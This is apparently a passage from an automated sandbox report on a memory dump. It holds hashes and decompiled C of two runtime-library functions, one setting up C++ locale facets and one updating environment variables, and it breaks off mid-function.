DName::operator|=.LIBCMT ref: 6E1B2C0A
DName::DName.LIBVCRUNTIME ref: 6E1B2C16
DName::operator+.LIBCMT ref: 6E1B2C24
DName::operator+.LIBCMT ref: 6E1B2C5E
DName::operator+.LIBCMT ref: 6E1B2C9F
UnDecorator::getReturnType.LIBCMT ref: 6E1B2CCF
operator+.LIBVCRUNTIME ref: 6E1B2DDC

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID:
API String ID: 1186856153-0
Opcode ID: 631fa3973187e4c018a5b2d70bd43f0aa4982f159f6872e294774a6f94f03667
Instruction ID: 9acdc76286cd79c533019e2fcbe40946821047d64789c5d4bcd3b201e29a2c6c
Opcode Fuzzy Hash: 631fa3973187e4c018a5b2d70bd43f0aa4982f159f6872e294774a6f94f03667
Instruction Fuzzy Hash: 60C1A475910209AFDF05CFE8C9A4EED7BF8BF19304F50446AE111A7280EB3199C9DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A72B0, Relevance: 28.8, APIs: 19, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E1A72B0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags, void* __fp0) {
				signed int _t65;
				signed char _t66;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t86;
				intOrPtr* _t88;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr* _t94;
				void* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				void* _t111;
				signed int _t117;
				void* _t118;
				void* _t147;
				signed int _t151;
				intOrPtr _t153;
				intOrPtr* _t154;
				void* _t155;
				void* _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				intOrPtr* _t164;
				void* _t165;
				void* _t166;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t194;

				_t194 = __fp0;
				_t154 = __esi;
				_t147 = __edx;
				E6E1A9DBF(0x6e1ed406, __ebx, __edi, __esi, 8);
				_push(0);
				_push(0);
				_t65 = E6E183233(__ebx, _t147, __edi, __esi);
				_t117 =  *(_t165 + 0x14);
				_t153 =  *((intOrPtr*)(_t165 + 0x10));
				_t151 = 1 << _t65 >> 1;
				if(( *(_t165 + 0xc) & 1) != 0) {
					_t110 = E6E161F29(_t117, 0x6e238be0, _t153, __esi);
					_t179 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t154 = _t110;
						_t111 = E6E182A2B(_t117, _t151, _t153, _t154, __eflags);
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t111);
						_t166 = _t166 + 0x10;
					} else {
						 *((intOrPtr*)(_t165 - 0x10)) = _t110;
						_t164 = E6E1A9621(_t117, _t153, __esi, _t179, 0x10);
						 *((intOrPtr*)(_t165 - 0x14)) = _t164;
						_t180 = _t164;
						if(_t164 == 0) {
							_t154 = 0;
							__eflags = 0;
						} else {
							 *(_t164 + 4) =  *(_t164 + 4) & _t117;
							 *_t164 = 0x6e1f253c;
							 *((intOrPtr*)(_t164 + 8)) = E6E192896(_t117, _t153, _t180);
							 *(_t164 + 0xc) = _t151;
						}
						_push( *((intOrPtr*)(_t165 - 0x10)));
						E6E1952CC(_t117, _t153, _t154, _t153, _t154);
						_t166 = _t166 + 0xc;
					}
				}
				_t66 =  *(_t165 + 0xc);
				if((_t66 & 0x00000020) != 0) {
					_t154 = E6E161F29(_t117, 0x6e221740, _t153, _t154);
					_t182 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t106 = E6E1A5A35(_t117, _t153, _t154, __eflags);
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t106);
						_t166 = _t166 + 0x10;
					} else {
						_t108 = E6E1A9621(_t117, _t153, _t154, _t182, 8);
						 *((intOrPtr*)(_t165 - 0x14)) = _t108;
						if(_t108 == 0) {
							_t108 = 0;
							__eflags = 0;
						} else {
							 *(_t108 + 4) =  *(_t108 + 4) & _t117;
							 *_t108 = 0x6e1f2558;
						}
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t108);
						_t166 = _t166 + 0xc;
					}
					_t66 =  *(_t165 + 0xc);
				}
				if((_t66 & 0x00000004) != 0) {
					_t158 = E6E161F29(_t117, 0x6e221744, _t153, _t154);
					_t185 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t80 = E6E1A5ACA(_t117, _t153, _t158, __eflags);
						_push(_t158);
						E6E1952CC(_t117, _t153, _t158, _t153, _t80);
						_t82 = E6E161F29(_t117, 0x6e221748, _t153, _t158);
						_push(_t117);
						_t159 = _t82;
						_t83 = E6E1A5B5F(_t117, _t153, _t159, __eflags);
						_push(_t159);
						E6E1952CC(_t117, _t153, _t159, _t153, _t83);
						_t85 = E6E161F29(_t117, 0x6e22174c, _t153, _t159);
						_push(_t117);
						_t160 = _t85;
						_t86 = E6E1A5C89(_t117, _t153, _t160, __eflags);
						_push(_t160);
						E6E1952CC(_t117, _t153, _t160, _t153, _t86);
						_t88 = E6E161F29(_t117, 0x6e221750, _t153, _t160);
						_push(_t117);
						_t154 = _t88;
						_t89 = E6E1A5BF4(_t117, _t153, _t154, __eflags);
						_push(_t154);
						E6E1952CC(_t117, _t153, _t154, _t153, _t89);
						_t166 = _t166 + 0x40;
					} else {
						_t91 = E6E1A9621(_t117, _t153, _t158, _t185, 8);
						 *((intOrPtr*)(_t165 - 0x14)) = _t91;
						_t186 = _t91;
						if(_t91 == 0) {
							_t91 = 0;
							__eflags = 0;
						} else {
							 *(_t91 + 4) =  *(_t91 + 4) & _t117;
							 *_t91 = 0x6e1f2574;
						}
						_push(_t158);
						E6E1952CC(_t117, _t153, _t158, _t153, _t91);
						_t174 = _t166 + 0xc;
						_t161 = E6E161F29(_t117, 0x6e221748, _t153, _t158);
						_t94 = E6E1A9621(_t117, _t153, _t161, _t186, 8);
						 *((intOrPtr*)(_t165 - 0x14)) = _t94;
						_t187 = _t94;
						if(_t94 == 0) {
							_t94 = 0;
							__eflags = 0;
						} else {
							 *(_t94 + 4) =  *(_t94 + 4) & 0x00000000;
							 *_t94 = 0x6e1f258c;
						}
						_push(_t161);
						E6E1952CC(_t117, _t153, _t161, _t153, _t94);
						_t175 = _t174 + 0xc;
						 *((intOrPtr*)(_t165 - 0x10)) = E6E161F29(_t117, 0x6e22174c, _t153, _t161);
						_t162 = E6E1A9621(_t117, _t153, _t161, _t187, 0x58);
						 *((intOrPtr*)(_t165 - 0x14)) = _t162;
						 *(_t165 - 4) = 7;
						_t188 = _t162;
						if(_t162 == 0) {
							_t162 = 0;
							__eflags = 0;
						} else {
							 *((intOrPtr*)(_t162 + 4)) = 0;
							_push(0);
							_push( *((intOrPtr*)(_t165 + 8)));
							 *(_t165 - 4) = 8;
							 *_t162 = 0x6e1f25a4;
							 *((char*)(_t162 + 0x28)) = 0;
							E6E1A7184(_t117, _t162, _t151, _t153, _t162, _t188, _t194);
							 *_t162 = 0x6e1f25d8;
						}
						_push( *((intOrPtr*)(_t165 - 0x10)));
						 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
						E6E1952CC(_t117, _t153, _t162, _t153, _t162);
						_t176 = _t175 + 0xc;
						 *((intOrPtr*)(_t165 - 0x10)) = E6E161F29(_t117, 0x6e221750, _t153, _t162);
						_t163 = E6E1A9621(_t117, _t153, _t162, _t188, 0x58);
						 *((intOrPtr*)(_t165 - 0x14)) = _t163;
						 *(_t165 - 4) = 0xd;
						_t189 = _t163;
						if(_t163 == 0) {
							_t154 = 0;
							__eflags = 0;
						} else {
							 *(_t163 + 4) =  *(_t163 + 4) & 0x00000000;
							_push(0);
							_push( *((intOrPtr*)(_t165 + 8)));
							 *(_t165 - 4) = 0xe;
							 *_t163 = 0x6e1f25a4;
							 *((char*)(_t163 + 0x28)) = 1;
							E6E1A7184(_t117, _t163, _t151, _t153, _t163, _t189, _t194);
							 *_t163 = 0x6e1f260c;
						}
						_push( *((intOrPtr*)(_t165 - 0x10)));
						 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
						E6E1952CC(_t117, _t153, _t154, _t153, _t154);
						_t166 = _t176 + 0xc;
					}
					_t66 =  *(_t165 + 0xc);
				}
				if((_t66 & 0x00000010) != 0) {
					_t155 = E6E161F29(_t117, 0x6e221754, _t153, _t154);
					_t191 = _t117;
					if(_t117 != 0) {
						_push(_t117);
						_t69 = E6E1A5D1E(_t117, _t153, _t155, __eflags);
						_push(_t155);
						E6E1952CC(_t117, _t153, _t155, _t153, _t69);
						_t71 = E6E161F29(_t117, 0x6e221758, _t153, _t155);
						_push(_t117);
						_t156 = _t71;
						_t72 = E6E1A5DB3(_t117, _t153, _t156, __eflags);
						_push(_t156);
						_t66 = E6E1952CC(_t117, _t153, _t156, _t153, _t72);
					} else {
						_t73 = E6E1A9621(_t117, _t153, _t155, _t191, 0x44);
						 *((intOrPtr*)(_t165 - 0x14)) = _t73;
						 *(_t165 - 4) = 0x12;
						_t192 = _t73;
						if(_t73 == 0) {
							_t74 = 0;
							__eflags = 0;
						} else {
							_push(_t117);
							_push( *((intOrPtr*)(_t165 + 8)));
							_t74 = E6E1A5F1D(_t73, _t155);
						}
						 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
						_push(_t155);
						E6E1952CC(_t117, _t153, _t155, _t153, _t74);
						_t118 = E6E161F29(_t117, 0x6e221758, _t153, _t155);
						_t157 = E6E1A9621(_t118, _t153, _t155, _t192, 0xc);
						 *((intOrPtr*)(_t165 - 0x14)) = _t157;
						_t193 = _t157;
						if(_t157 == 0) {
							_t157 = 0;
							__eflags = 0;
						} else {
							 *(_t157 + 4) =  *(_t157 + 4) & 0x00000000;
							 *_t157 = 0x6e1f266c;
							 *(_t157 + 8) =  *(_t157 + 8) & 0x00000000;
							E6E1A7287(_t118, _t153, _t193,  *((intOrPtr*)(_t165 + 8)));
						}
						_push(_t118);
						_t66 = E6E1952CC(_t118, _t153, _t157, _t153, _t157);
					}
				}
				return E6E1A9D88(_t66);
			}

0x6e1a72b0
0x6e1a72b0
0x6e1a72b0
0x6e1a72b7
0x6e1a72bc
0x6e1a72be
0x6e1a72c0
0x6e1a72c5
0x6e1a72ca
0x6e1a72d4
0x6e1a72d9
0x6e1a72e0
0x6e1a72e5
0x6e1a72e7
0x6e1a7324
0x6e1a7325
0x6e1a7327
0x6e1a732c
0x6e1a732f
0x6e1a7334
0x6e1a72e9
0x6e1a72eb
0x6e1a72f3
0x6e1a72f5
0x6e1a72f9
0x6e1a72fb
0x6e1a7313
0x6e1a7313
0x6e1a72fd
0x6e1a72fd
0x6e1a7300
0x6e1a730b
0x6e1a730e
0x6e1a730e
0x6e1a7315
0x6e1a731a
0x6e1a731f
0x6e1a731f
0x6e1a72e7
0x6e1a7337
0x6e1a733c
0x6e1a7348
0x6e1a734a
0x6e1a734c
0x6e1a7377
0x6e1a7378
0x6e1a737d
0x6e1a7380
0x6e1a7385
0x6e1a734e
0x6e1a7350
0x6e1a7355
0x6e1a735b
0x6e1a7368
0x6e1a7368
0x6e1a735d
0x6e1a735d
0x6e1a7360
0x6e1a7360
0x6e1a736a
0x6e1a736d
0x6e1a7372
0x6e1a7372
0x6e1a7388
0x6e1a7388
0x6e1a738d
0x6e1a739d
0x6e1a739f
0x6e1a73a1
0x6e1a74bf
0x6e1a74c0
0x6e1a74c5
0x6e1a74c8
0x6e1a74d5
0x6e1a74da
0x6e1a74db
0x6e1a74dd
0x6e1a74e2
0x6e1a74e5
0x6e1a74f2
0x6e1a74f7
0x6e1a74f8
0x6e1a74fa
0x6e1a74ff
0x6e1a7502
0x6e1a750f
0x6e1a7514
0x6e1a7515
0x6e1a7517
0x6e1a751c
0x6e1a751f
0x6e1a7524
0x6e1a73a7
0x6e1a73a9
0x6e1a73ae
0x6e1a73b2
0x6e1a73b4
0x6e1a73c1
0x6e1a73c1
0x6e1a73b6
0x6e1a73b6
0x6e1a73b9
0x6e1a73b9
0x6e1a73c3
0x6e1a73c6
0x6e1a73cb
0x6e1a73da
0x6e1a73dc
0x6e1a73e1
0x6e1a73e5
0x6e1a73e7
0x6e1a73f5
0x6e1a73f5
0x6e1a73e9
0x6e1a73e9
0x6e1a73ed
0x6e1a73ed
0x6e1a73f7
0x6e1a73fa
0x6e1a73ff
0x6e1a740e
0x6e1a7416
0x6e1a7419
0x6e1a741c
0x6e1a7423
0x6e1a7425
0x6e1a744c
0x6e1a744c
0x6e1a7427
0x6e1a7429
0x6e1a742c
0x6e1a742d
0x6e1a7432
0x6e1a7436
0x6e1a743c
0x6e1a743f
0x6e1a7444
0x6e1a7444
0x6e1a744e
0x6e1a7451
0x6e1a7457
0x6e1a745c
0x6e1a746b
0x6e1a7473
0x6e1a7476
0x6e1a7479
0x6e1a7480
0x6e1a7482
0x6e1a74aa
0x6e1a74aa
0x6e1a7484
0x6e1a7484
0x6e1a7488
0x6e1a748a
0x6e1a748f
0x6e1a7493
0x6e1a7499
0x6e1a749d
0x6e1a74a2
0x6e1a74a2
0x6e1a74ac
0x6e1a74af
0x6e1a74b5
0x6e1a74ba
0x6e1a74ba
0x6e1a7527
0x6e1a7527
0x6e1a752c
0x6e1a753c
0x6e1a753e
0x6e1a7540
0x6e1a75bc
0x6e1a75bd
0x6e1a75c2
0x6e1a75c5
0x6e1a75d2
0x6e1a75d7
0x6e1a75d8
0x6e1a75da
0x6e1a75df
0x6e1a75e2
0x6e1a7542
0x6e1a7544
0x6e1a754a
0x6e1a754d
0x6e1a7554
0x6e1a7556
0x6e1a7565
0x6e1a7565
0x6e1a7558
0x6e1a7558
0x6e1a7559
0x6e1a755e
0x6e1a755e
0x6e1a7567
0x6e1a756b
0x6e1a756e
0x6e1a7582
0x6e1a7589
0x6e1a758b
0x6e1a758f
0x6e1a7591
0x6e1a75ad
0x6e1a75ad
0x6e1a7593
0x6e1a7593
0x6e1a759c
0x6e1a75a2
0x6e1a75a6
0x6e1a75a6
0x6e1a75af
0x6e1a75b2
0x6e1a75b7
0x6e1a7540
0x6e1a75ef

APIs

__EH_prolog3.LIBCMT ref: 6E1A72B7

Part of subcall function 6E183233: __EH_prolog3_GS.LIBCMT ref: 6E18323A

__Getcoll.LIBCPMT ref: 6E1A7306
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A731A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A732F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A736D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7380
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73C6
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73FA
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74B5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74C8
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74E5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7502
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A751F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7457

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

numpunct.LIBCPMT ref: 6E1A755E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A756E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75B2
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75C5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75E2

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$H_prolog3Lockitstd::_$GetcollH_prolog3_Lockit::_Lockit::~_numpunct
String ID:
API String ID: 2403706939-0
Opcode ID: 2e2c826875bdc3ba4b280b0e13ac1eb53cf60e5606f5744a4802da6b8aba7080
Instruction ID: 84ae787f9ff0a5ff380b8b51d200b6eba5664968edfdeba59b2c63ad47966137
Opcode Fuzzy Hash: 2e2c826875bdc3ba4b280b0e13ac1eb53cf60e5606f5744a4802da6b8aba7080
Instruction Fuzzy Hash: CA91EAB5D04311ABD710DBF98851AFF7BACEF41254F11486DED18BB280DB318AD4B6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DCB38, Relevance: 25.9, APIs: 17, Instructions: 411
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E1DCB38(signed int __ebx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v48;
				signed int _v100;
				signed int _v136;
				signed int _t116;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				void* _t147;
				signed int _t152;
				signed int* _t154;
				signed int* _t160;
				signed int _t166;
				signed int _t169;
				void* _t170;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t182;
				intOrPtr* _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr* _t210;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t237;
				signed int _t238;
				void* _t239;
				void* _t241;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				void* _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				WCHAR* _t302;
				signed int _t303;
				signed int _t304;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;
				void* _t324;

				_t327 = __fp0;
				_t222 = __ebx;
				_t308 = _t316;
				_t317 = _t316 - 0x10;
				_t295 = _a4;
				_t326 = _t295;
				if(_t295 != 0) {
					_push(__ebx);
					_t286 = _t295;
					_t116 = E6E1AD990(_t295, 0x3d);
					_v20 = _t116;
					__eflags = _t116;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t116 - _t295;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t116 + 1));
							L120();
							_t222 = 0;
							__eflags =  *0x6e22204c - _t222; // 0x5ad788
							if(__eflags != 0) {
								L14:
								_t121 =  *0x6e22204c; // 0x5ad788
								_v12 = _t121;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L39;
								} else {
									_t124 = E6E1DD16B(_t295, _v20 - _t295);
									_v16 = _t124;
									_t237 = _v12;
									__eflags = _t124;
									if(_t124 < 0) {
										L24:
										__eflags = _v5 - _t222;
										if(_v5 == _t222) {
											goto L40;
										} else {
											_t125 =  ~_t124;
											_v16 = _t125;
											_t30 = _t125 + 2; // 0x2
											_t282 = _t30;
											__eflags = _t282 - _t125;
											if(_t282 < _t125) {
												goto L39;
											} else {
												__eflags = _t282 - 0x3fffffff;
												if(_t282 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E6E1DD2FC(_t237, _t282, 4);
													E6E1D1BE4(_t222);
													_t128 = _v12;
													_t317 = _t317 + 0x10;
													__eflags = _t128;
													if(_t128 == 0) {
														goto L39;
													} else {
														_t238 = _v16;
														_t286 = _t222;
														 *(_t128 + _t238 * 4) = _t295;
														 *(_t128 + 4 + _t238 * 4) = _t222;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t237 - _t222;
										if( *_t237 == _t222) {
											goto L24;
										} else {
											E6E1D1BE4( *((intOrPtr*)(_t237 + _t124 * 4)));
											_t281 = _v16;
											__eflags = _v5 - _t222;
											if(_v5 != _t222) {
												_t286 = _t222;
												 *(_v12 + _t281 * 4) = _t295;
											} else {
												_t282 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t282 + _t281 * 4)) - _t222;
													if( *((intOrPtr*)(_t282 + _t281 * 4)) == _t222) {
														break;
													}
													 *((intOrPtr*)(_t282 + _t281 * 4)) =  *((intOrPtr*)(_t282 + 4 + _t281 * 4));
													_t281 = _t281 + 1;
													__eflags = _t281;
												}
												_v16 = E6E1DD2FC(_t282, _t281, 4);
												E6E1D1BE4(_t222);
												_t128 = _v16;
												_t317 = _t317 + 0x10;
												__eflags = _t128;
												if(_t128 != 0) {
													L29:
													 *0x6e22204c = _t128;
												}
											}
											__eflags = _a8 - _t222;
											if(_a8 == _t222) {
												goto L40;
											} else {
												_t239 = _t295 + 1;
												do {
													_t129 =  *_t295;
													_t295 = _t295 + 1;
													__eflags = _t129;
												} while (_t129 != 0);
												_v16 = _t295 - _t239 + 2;
												_t298 = E6E1D16BE(_t295 - _t239 + 2, 1);
												_pop(_t241);
												__eflags = _t298;
												if(_t298 == 0) {
													L37:
													E6E1D1BE4(_t298);
													goto L40;
												} else {
													_t133 = E6E1CEEB6(_t298, _v16, _a4);
													_t319 = _t317 + 0xc;
													__eflags = _t133;
													if(__eflags != 0) {
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														E6E1C22EF();
														asm("int3");
														_push(_t308);
														_t310 = _t319;
														_t320 = _t319 - 0x10;
														_push(_t222);
														_t225 = _v48;
														__eflags = _t225;
														if(__eflags != 0) {
															_push(_t298);
															_push(_t286);
															_push(0x3d);
															_push(_t225);
															_t288 = _t225;
															_t135 = E6E1E9087(_t241);
															_v20 = _t135;
															__eflags = _t135;
															if(__eflags == 0) {
																L81:
																 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0x16;
																goto L82;
															} else {
																__eflags = _t135 - _t225;
																if(__eflags == 0) {
																	goto L81;
																} else {
																	_t139 =  *(_t135 + 2) & 0x0000ffff;
																	_v24 = _t139;
																	_v16 = _t139;
																	E6E1DD151();
																	_t300 =  *0x6e222050; // 0x0
																	_t226 = 0;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		L59:
																		_v20 = _v20 - _t288 >> 1;
																		_t142 = E6E1DD1C0(_t288, _v20 - _t288 >> 1);
																		_v12 = _t142;
																		__eflags = _t142;
																		if(_t142 < 0) {
																			L67:
																			__eflags = _v16 - _t226;
																			if(_v16 == _t226) {
																				goto L83;
																			} else {
																				_t143 =  ~_t142;
																				_v12 = _t143;
																				_t75 = _t143 + 2; // 0x2
																				_t252 = _t75;
																				__eflags = _t252 - _t143;
																				if(_t252 < _t143) {
																					goto L82;
																				} else {
																					__eflags = _t252 - 0x3fffffff;
																					if(_t252 >= 0x3fffffff) {
																						goto L82;
																					} else {
																						_t301 = E6E1DD2FC(_t300, _t252, 4);
																						E6E1D1BE4(_t226);
																						_t320 = _t320 + 0x10;
																						__eflags = _t301;
																						if(_t301 == 0) {
																							goto L82;
																						} else {
																							_t253 = _v12;
																							_t288 = _t226;
																							_t146 = _v0;
																							 *(_t301 + _t253 * 4) = _t146;
																							 *(_t301 + 4 + _t253 * 4) = _t226;
																							goto L72;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *_t300 - _t226;
																			if( *_t300 == _t226) {
																				goto L67;
																			} else {
																				E6E1D1BE4( *((intOrPtr*)(_t300 + _t142 * 4)));
																				_t274 = _v12;
																				__eflags = _v16 - _t226;
																				if(_v16 == _t226) {
																					while(1) {
																						__eflags =  *(_t300 + _t274 * 4) - _t226;
																						if( *(_t300 + _t274 * 4) == _t226) {
																							break;
																						}
																						 *(_t300 + _t274 * 4) =  *(_t300 + 4 + _t274 * 4);
																						_t274 = _t274 + 1;
																						__eflags = _t274;
																					}
																					_t301 = E6E1DD2FC(_t300, _t274, 4);
																					E6E1D1BE4(_t226);
																					_t320 = _t320 + 0x10;
																					_t146 = _t288;
																					__eflags = _t301;
																					if(_t301 != 0) {
																						L72:
																						 *0x6e222050 = _t301;
																					}
																				} else {
																					_t146 = _v0;
																					_t288 = _t226;
																					 *(_t300 + _t274 * 4) = _t146;
																				}
																				__eflags = _a4 - _t226;
																				if(_a4 == _t226) {
																					goto L83;
																				} else {
																					_t254 = _t146;
																					_t84 = _t254 + 2; // 0x2
																					_t283 = _t84;
																					do {
																						_t147 =  *_t254;
																						_t254 = _t254 + 2;
																						__eflags = _t147 - _t226;
																					} while (_t147 != _t226);
																					_t85 = (_t254 - _t283 >> 1) + 2; // 0x0
																					_v16 = _t85;
																					_t302 = E6E1D16BE(_t85, 2);
																					_pop(_t258);
																					__eflags = _t302;
																					if(_t302 == 0) {
																						L80:
																						E6E1D1BE4(_t302);
																						goto L83;
																					} else {
																						_t152 = E6E1CB0B9(_t302, _v16, _v0);
																						_t322 = _t320 + 0xc;
																						__eflags = _t152;
																						if(_t152 != 0) {
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							E6E1C22EF();
																							asm("int3");
																							_push(_t310);
																							_t312 = _t322;
																							_push(_t288);
																							_t290 = _v100;
																							__eflags = _t290;
																							if(_t290 != 0) {
																								_t260 = 0;
																								_t154 = _t290;
																								__eflags =  *_t290;
																								if( *_t290 != 0) {
																									do {
																										_t154 =  &(_t154[1]);
																										_t260 = _t260 + 1;
																										__eflags =  *_t154;
																									} while ( *_t154 != 0);
																								}
																								_t96 = _t260 + 1; // 0x2
																								_t303 = E6E1D16BE(_t96, 4);
																								_t262 = _t302;
																								__eflags = _t303;
																								if(_t303 == 0) {
																									L101:
																									E6E1C4D58(_t226, _t262, _t283, _t290, _t303, _t327);
																									goto L102;
																								} else {
																									_t270 =  *_t290;
																									__eflags = _t270;
																									if(_t270 == 0) {
																										L100:
																										E6E1D1BE4(0);
																										_t177 = _t303;
																										goto L88;
																									} else {
																										_push(_t226);
																										_t226 = _t303 - _t290;
																										__eflags = _t226;
																										do {
																											_t97 = _t270 + 1; // 0x5
																											_t283 = _t97;
																											do {
																												_t178 =  *_t270;
																												_t270 = _t270 + 1;
																												__eflags = _t178;
																											} while (_t178 != 0);
																											_t262 = _t270 - _t283;
																											_t98 = _t262 + 1; // 0x6
																											_v16 = _t98;
																											 *(_t226 + _t290) = E6E1D16BE(_t98, 1);
																											E6E1D1BE4(0);
																											_t322 = _t322 + 0xc;
																											__eflags =  *(_t226 + _t290);
																											if( *(_t226 + _t290) == 0) {
																												goto L101;
																											} else {
																												_t182 = E6E1CEEB6( *(_t226 + _t290), _v16,  *_t290);
																												_t322 = _t322 + 0xc;
																												__eflags = _t182;
																												if(_t182 != 0) {
																													L102:
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													E6E1C22EF();
																													asm("int3");
																													_push(_t312);
																													_push(_t262);
																													_push(_t262);
																													_push(_t290);
																													_t291 = _v136;
																													__eflags = _t291;
																													if(_t291 != 0) {
																														_t284 = 0;
																														_t160 = _t291;
																														_t263 = 0;
																														_v20 = 0;
																														__eflags =  *_t291;
																														if( *_t291 != 0) {
																															do {
																																_t160 =  &(_t160[1]);
																																_t263 = _t263 + 1;
																																__eflags =  *_t160;
																															} while ( *_t160 != 0);
																														}
																														_t107 = _t263 + 1; // 0x2
																														_t304 = E6E1D16BE(_t107, 4);
																														_t265 = _t303;
																														__eflags = _t304;
																														if(_t304 == 0) {
																															L118:
																															E6E1C4D58(_t226, _t265, _t284, _t291, _t304, _t327);
																															goto L119;
																														} else {
																															_t267 =  *_t291;
																															__eflags = _t267;
																															if(_t267 == 0) {
																																L117:
																																E6E1D1BE4(0);
																																_t169 = _t304;
																																goto L105;
																															} else {
																																_push(_t226);
																																_t226 = _t304 - _t291;
																																__eflags = _t226;
																																do {
																																	_t108 = _t267 + 2; // 0x6
																																	_t284 = _t108;
																																	do {
																																		_t170 =  *_t267;
																																		_t267 = _t267 + 2;
																																		__eflags = _t170 - _v20;
																																	} while (_t170 != _v20);
																																	_t110 = (_t267 - _t284 >> 1) + 1; // 0x3
																																	_v24 = _t110;
																																	 *(_t226 + _t291) = E6E1D16BE(_t110, 2);
